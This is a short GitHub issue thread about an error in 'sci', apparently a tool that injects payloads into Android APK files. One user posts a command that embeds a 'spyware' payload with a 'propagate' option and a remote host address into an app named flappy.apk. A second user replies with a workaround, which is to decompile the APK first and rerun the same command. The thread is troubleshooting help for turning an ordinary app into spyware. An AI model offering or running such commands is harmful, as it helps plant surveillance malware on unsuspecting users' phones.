sci icon indicating copy to clipboard operation
sci copied to clipboard

error

Open pretech86 opened this issue 6 years ago • 1 comments

i used this command python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123 and it give the following error FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'

can you help me please

pretech86 avatar Dec 10 '19 12:12 pretech86

i used this command python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123 and it give the following error FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'

can you help me please

Try Decompiling the flappy.apk first then run your command again like this

python3 sci.py -a /root/Desktop/flappy payload spyware -ppg propagate -rh 192.168.8.123

Maybe that might work.

Morsmalleo avatar Jul 14 '22 06:07 Morsmalleo